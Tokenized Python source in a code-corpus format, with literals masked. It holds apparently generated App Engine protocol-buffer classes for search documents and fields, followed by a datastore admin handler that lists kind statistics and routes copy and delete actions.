set_type ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_language ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_string_value ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_type_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . type_ ) ) <EOL> if self . has_language_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . language_ ) ) <EOL> if self . 
has_string_value_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . string_value_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ktype = <NUM_LIT:1> <EOL> klanguage = <NUM_LIT:2> <EOL> kstring_value = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:type>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class Field ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_name_ = <NUM_LIT:0> <EOL> name_ = "<STR_LIT>" <EOL> has_value_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . value_ = FieldValue ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def name ( self ) : return self . name_ <EOL> def set_name ( self , x ) : <EOL> self . has_name_ = <NUM_LIT:1> <EOL> self . name_ = x <EOL> def clear_name ( self ) : <EOL> if self . has_name_ : <EOL> self . has_name_ = <NUM_LIT:0> <EOL> self . name_ = "<STR_LIT>" <EOL> def has_name ( self ) : return self . has_name_ <EOL> def value ( self ) : return self . value_ <EOL> def mutable_value ( self ) : self . has_value_ = <NUM_LIT:1> ; return self . value_ <EOL> def clear_value ( self ) : self . has_value_ = <NUM_LIT:0> ; self . value_ . Clear ( ) <EOL> def has_value ( self ) : return self . 
has_value_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_name ( ) ) : self . set_name ( x . name ( ) ) <EOL> if ( x . has_value ( ) ) : self . mutable_value ( ) . MergeFrom ( x . value ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_name_ != x . has_name_ : return <NUM_LIT:0> <EOL> if self . has_name_ and self . name_ != x . name_ : return <NUM_LIT:0> <EOL> if self . has_value_ != x . has_value_ : return <NUM_LIT:0> <EOL> if self . has_value_ and self . value_ != x . value_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_name_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_value_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> elif not self . value_ . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . name_ ) ) <EOL> n += self . lengthString ( self . value_ . ByteSize ( ) ) <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_name_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . name_ ) ) <EOL> if ( self . has_value_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( self . value_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_name ( ) <EOL> self . clear_value ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . name_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . value_ . ByteSize ( ) ) <EOL> self . value_ . 
OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_name_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . name_ ) <EOL> if ( self . has_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . value_ . ByteSizePartial ( ) ) <EOL> self . value_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_name ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_value ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_name_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_ ) ) <EOL> if self . has_value_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . value_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kname = <NUM_LIT:1> <EOL> kvalue = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:name>" , <EOL> <NUM_LIT:2> : "<STR_LIT:value>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . 
Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class FieldTypes ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_name_ = <NUM_LIT:0> <EOL> name_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> self . type_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def name ( self ) : return self . name_ <EOL> def set_name ( self , x ) : <EOL> self . has_name_ = <NUM_LIT:1> <EOL> self . name_ = x <EOL> def clear_name ( self ) : <EOL> if self . has_name_ : <EOL> self . has_name_ = <NUM_LIT:0> <EOL> self . name_ = "<STR_LIT>" <EOL> def has_name ( self ) : return self . has_name_ <EOL> def type_size ( self ) : return len ( self . type_ ) <EOL> def type_list ( self ) : return self . type_ <EOL> def type ( self , i ) : <EOL> return self . type_ [ i ] <EOL> def set_type ( self , i , x ) : <EOL> self . type_ [ i ] = x <EOL> def add_type ( self , x ) : <EOL> self . type_ . append ( x ) <EOL> def clear_type ( self ) : <EOL> self . type_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_name ( ) ) : self . set_name ( x . name ( ) ) <EOL> for i in xrange ( x . type_size ( ) ) : self . add_type ( x . type ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_name_ != x . has_name_ : return <NUM_LIT:0> <EOL> if self . has_name_ and self . name_ != x . name_ : return <NUM_LIT:0> <EOL> if len ( self . type_ ) != len ( x . type_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . type_ , x . type_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_name_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . 
append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . name_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . type_ ) <EOL> for i in xrange ( len ( self . type_ ) ) : n += self . lengthVarInt64 ( self . type_ [ i ] ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_name_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . name_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . type_ ) <EOL> for i in xrange ( len ( self . type_ ) ) : n += self . lengthVarInt64 ( self . type_ [ i ] ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_name ( ) <EOL> self . clear_type ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . name_ ) <EOL> for i in xrange ( len ( self . type_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . type_ [ i ] ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_name_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . name_ ) <EOL> for i in xrange ( len ( self . type_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . type_ [ i ] ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_name ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . add_type ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_name_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . 
type_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatInt32 ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kname = <NUM_LIT:1> <EOL> ktype = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:name>" , <EOL> <NUM_LIT:2> : "<STR_LIT:type>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class Document ( ProtocolBuffer . ProtocolMessage ) : <EOL> DISK = <NUM_LIT:0> <EOL> _Storage_NAMES = { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } <EOL> def Storage_Name ( cls , x ) : return cls . _Storage_NAMES . get ( x , "<STR_LIT>" ) <EOL> Storage_Name = classmethod ( Storage_Name ) <EOL> has_id_ = <NUM_LIT:0> <EOL> id_ = "<STR_LIT>" <EOL> has_language_ = <NUM_LIT:0> <EOL> language_ = "<STR_LIT>" <EOL> has_order_id_ = <NUM_LIT:0> <EOL> order_id_ = <NUM_LIT:0> <EOL> has_storage_ = <NUM_LIT:0> <EOL> storage_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . field_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def id ( self ) : return self . id_ <EOL> def set_id ( self , x ) : <EOL> self . has_id_ = <NUM_LIT:1> <EOL> self . id_ = x <EOL> def clear_id ( self ) : <EOL> if self . has_id_ : <EOL> self . has_id_ = <NUM_LIT:0> <EOL> self . id_ = "<STR_LIT>" <EOL> def has_id ( self ) : return self . 
has_id_ <EOL> def language ( self ) : return self . language_ <EOL> def set_language ( self , x ) : <EOL> self . has_language_ = <NUM_LIT:1> <EOL> self . language_ = x <EOL> def clear_language ( self ) : <EOL> if self . has_language_ : <EOL> self . has_language_ = <NUM_LIT:0> <EOL> self . language_ = "<STR_LIT>" <EOL> def has_language ( self ) : return self . has_language_ <EOL> def field_size ( self ) : return len ( self . field_ ) <EOL> def field_list ( self ) : return self . field_ <EOL> def field ( self , i ) : <EOL> return self . field_ [ i ] <EOL> def mutable_field ( self , i ) : <EOL> return self . field_ [ i ] <EOL> def add_field ( self ) : <EOL> x = Field ( ) <EOL> self . field_ . append ( x ) <EOL> return x <EOL> def clear_field ( self ) : <EOL> self . field_ = [ ] <EOL> def order_id ( self ) : return self . order_id_ <EOL> def set_order_id ( self , x ) : <EOL> self . has_order_id_ = <NUM_LIT:1> <EOL> self . order_id_ = x <EOL> def clear_order_id ( self ) : <EOL> if self . has_order_id_ : <EOL> self . has_order_id_ = <NUM_LIT:0> <EOL> self . order_id_ = <NUM_LIT:0> <EOL> def has_order_id ( self ) : return self . has_order_id_ <EOL> def storage ( self ) : return self . storage_ <EOL> def set_storage ( self , x ) : <EOL> self . has_storage_ = <NUM_LIT:1> <EOL> self . storage_ = x <EOL> def clear_storage ( self ) : <EOL> if self . has_storage_ : <EOL> self . has_storage_ = <NUM_LIT:0> <EOL> self . storage_ = <NUM_LIT:0> <EOL> def has_storage ( self ) : return self . has_storage_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_id ( ) ) : self . set_id ( x . id ( ) ) <EOL> if ( x . has_language ( ) ) : self . set_language ( x . language ( ) ) <EOL> for i in xrange ( x . field_size ( ) ) : self . add_field ( ) . CopyFrom ( x . field ( i ) ) <EOL> if ( x . has_order_id ( ) ) : self . set_order_id ( x . order_id ( ) ) <EOL> if ( x . has_storage ( ) ) : self . set_storage ( x . 
storage ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_id_ != x . has_id_ : return <NUM_LIT:0> <EOL> if self . has_id_ and self . id_ != x . id_ : return <NUM_LIT:0> <EOL> if self . has_language_ != x . has_language_ : return <NUM_LIT:0> <EOL> if self . has_language_ and self . language_ != x . language_ : return <NUM_LIT:0> <EOL> if len ( self . field_ ) != len ( x . field_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . field_ , x . field_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . has_order_id_ != x . has_order_id_ : return <NUM_LIT:0> <EOL> if self . has_order_id_ and self . order_id_ != x . order_id_ : return <NUM_LIT:0> <EOL> if self . has_storage_ != x . has_storage_ : return <NUM_LIT:0> <EOL> if self . has_storage_ and self . storage_ != x . storage_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . field_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_id_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . id_ ) ) <EOL> if ( self . has_language_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . language_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . field_ ) <EOL> for i in xrange ( len ( self . field_ ) ) : n += self . lengthString ( self . field_ [ i ] . ByteSize ( ) ) <EOL> if ( self . has_order_id_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . order_id_ ) <EOL> if ( self . has_storage_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . storage_ ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_id_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . id_ ) ) <EOL> if ( self . has_language_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . 
language_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . field_ ) <EOL> for i in xrange ( len ( self . field_ ) ) : n += self . lengthString ( self . field_ [ i ] . ByteSizePartial ( ) ) <EOL> if ( self . has_order_id_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . order_id_ ) <EOL> if ( self . has_storage_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . storage_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_id ( ) <EOL> self . clear_language ( ) <EOL> self . clear_field ( ) <EOL> self . clear_order_id ( ) <EOL> self . clear_storage ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . id_ ) <EOL> if ( self . has_language_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . language_ ) <EOL> for i in xrange ( len ( self . field_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . field_ [ i ] . ByteSize ( ) ) <EOL> self . field_ [ i ] . OutputUnchecked ( out ) <EOL> if ( self . has_order_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putVarInt32 ( self . order_id_ ) <EOL> if ( self . has_storage_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . storage_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . id_ ) <EOL> if ( self . has_language_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . language_ ) <EOL> for i in xrange ( len ( self . field_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . field_ [ i ] . ByteSizePartial ( ) ) <EOL> self . field_ [ i ] . OutputPartial ( out ) <EOL> if ( self . has_order_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putVarInt32 ( self . order_id_ ) <EOL> if ( self . has_storage_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . 
putVarInt32 ( self . storage_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_id ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_language ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_field ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT:32> : <EOL> self . set_order_id ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_storage ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_id_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . id_ ) ) <EOL> if self . has_language_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . language_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . field_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> if self . has_order_id_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . order_id_ ) ) <EOL> if self . has_storage_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . storage_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . 
get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kid = <NUM_LIT:1> <EOL> klanguage = <NUM_LIT:2> <EOL> kfield = <NUM_LIT:3> <EOL> korder_id = <NUM_LIT:4> <EOL> kstorage = <NUM_LIT:5> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:id>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> } , <NUM_LIT:5> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:5> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> if _extension_runtime : <EOL> pass <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from google . appengine . api import datastore_errors <EOL> from google . appengine . ext import webapp <EOL> from google . appengine . ext . datastore_admin import copy_handler <EOL> from google . appengine . ext . datastore_admin import delete_handler <EOL> from google . appengine . ext . datastore_admin import utils <EOL> from google . appengine . ext . db import stats <EOL> from google . appengine . ext . db import metadata <EOL> from google . appengine . ext . webapp import util <EOL> GET_ACTIONS = { <EOL> '<STR_LIT>' : copy_handler . ConfirmCopyHandler . Render , <EOL> '<STR_LIT>' : delete_handler . ConfirmDeleteHandler . Render , <EOL> } <EOL> def _GetDatastoreStats ( kinds_list , use_stats_kinds = False ) : <EOL> """<STR_LIT>""" <EOL> global_stat = stats . GlobalStat . all ( ) . fetch ( <NUM_LIT:1> ) <EOL> if not global_stat : <EOL> return _KindsListToTuple ( kinds_list ) <EOL> global_ts = global_stat [ <NUM_LIT:0> ] . timestamp <EOL> kind_stats = stats . KindStat . all ( ) . filter ( '<STR_LIT>' , global_ts ) . fetch ( <NUM_LIT:1000> ) <EOL> if not kind_stats : <EOL> return _KindsListToTuple ( kinds_list ) <EOL> results = { } <EOL> for kind_ent in kind_stats : <EOL> if ( not kind_ent . kind_name . startswith ( '<STR_LIT>' ) <EOL> and ( use_stats_kinds or kind_ent . kind_name in kinds_list ) ) : <EOL> results [ kind_ent . kind_name ] = _PresentatableKindStats ( kind_ent ) <EOL> utils . CacheStats ( results . values ( ) ) <EOL> for kind_str in kinds_list or [ ] : <EOL> if kind_str not in results : <EOL> results [ kind_str ] = { '<STR_LIT>' : kind_str } <EOL> return ( global_ts , <EOL> sorted ( results . values ( ) , key = lambda x : x [ '<STR_LIT>' ] ) ) <EOL> def _KindsListToTuple ( kinds_list ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' , [ { '<STR_LIT>' : kind } for kind in sorted ( kinds_list ) ] <EOL> def _PresentatableKindStats ( kind_ent ) : <EOL> """<STR_LIT>""" <EOL> count = kind_ent . 
count <EOL> total_bytes = kind_ent . bytes <EOL> average_bytes = total_bytes / count <EOL> return { '<STR_LIT>' : kind_ent . kind_name , <EOL> '<STR_LIT:count>' : utils . FormatThousands ( kind_ent . count ) , <EOL> '<STR_LIT>' : utils . GetPrettyBytes ( total_bytes ) , <EOL> '<STR_LIT>' : total_bytes , <EOL> '<STR_LIT>' : utils . GetPrettyBytes ( average_bytes ) , <EOL> } <EOL> class RouteByActionHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def ListActions ( self , error = None ) : <EOL> """<STR_LIT>""" <EOL> use_stats_kinds = False <EOL> kinds = [ ] <EOL> try : <EOL> kinds = self . GetKinds ( ) <EOL> if not kinds : <EOL> use_stats_kinds = True <EOL> except datastore_errors . Error : <EOL> use_stats_kinds = True <EOL> last_stats_update , kind_stats = _GetDatastoreStats ( <EOL> kinds , use_stats_kinds = use_stats_kinds ) <EOL> template_params = { <EOL> '<STR_LIT>' : kind_stats , <EOL> '<STR_LIT>' : self . request . path + '<STR_LIT:?>' + self . request . query_string , <EOL> '<STR_LIT>' : last_stats_update , <EOL> '<STR_LIT>' : self . request . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . request . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : sorted ( GET_ACTIONS . keys ( ) ) , <EOL> '<STR_LIT:error>' : error , <EOL> '<STR_LIT>' : utils . DatastoreAdminOperation . all ( ) . fetch ( <NUM_LIT:100> ) , <EOL> } <EOL> utils . RenderToResponse ( self , '<STR_LIT>' , template_params ) <EOL> def RouteAction ( self , action_dict ) : <EOL> action = self . request . get ( '<STR_LIT:action>' ) <EOL> if not action : <EOL> self . ListActions ( ) <EOL> elif action not in action_dict : <EOL> error = '<STR_LIT>' % action <EOL> self . ListActions ( error = error ) <EOL> else : <EOL> action_dict [ action ] ( self ) <EOL> def get ( self ) : <EOL> self . RouteAction ( GET_ACTIONS ) <EOL> def post ( self ) : <EOL> self . RouteAction ( GET_ACTIONS ) <EOL> def GetKinds ( self ) : <EOL> """<STR_LIT>""" <EOL> kinds = metadata . Kind . all ( ) . 
fetch ( <NUM_LIT> ) <EOL> kind_names = [ ] <EOL> for kind in kinds : <EOL> kind_name = kind . kind_name <EOL> if ( kind_name . startswith ( '<STR_LIT>' ) or <EOL> kind_name == utils . DatastoreAdminOperation . kind ( ) ) : <EOL> continue <EOL> kind_names . append ( kind_name ) <EOL> return kind_names <EOL> class StaticResourceHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> _BASE_FILE_PATH = os . path . dirname ( __file__ ) <EOL> _RESOURCE_MAP = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def get ( self ) : <EOL> relative_path = self . request . path . split ( utils . config . BASE_PATH + '<STR_LIT:/>' ) [ <NUM_LIT:1> ] <EOL> if relative_path not in self . _RESOURCE_MAP : <EOL> self . response . set_status ( <NUM_LIT> ) <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> return <EOL> path = os . path . join ( self . _BASE_FILE_PATH , relative_path ) <EOL> self . response . headers 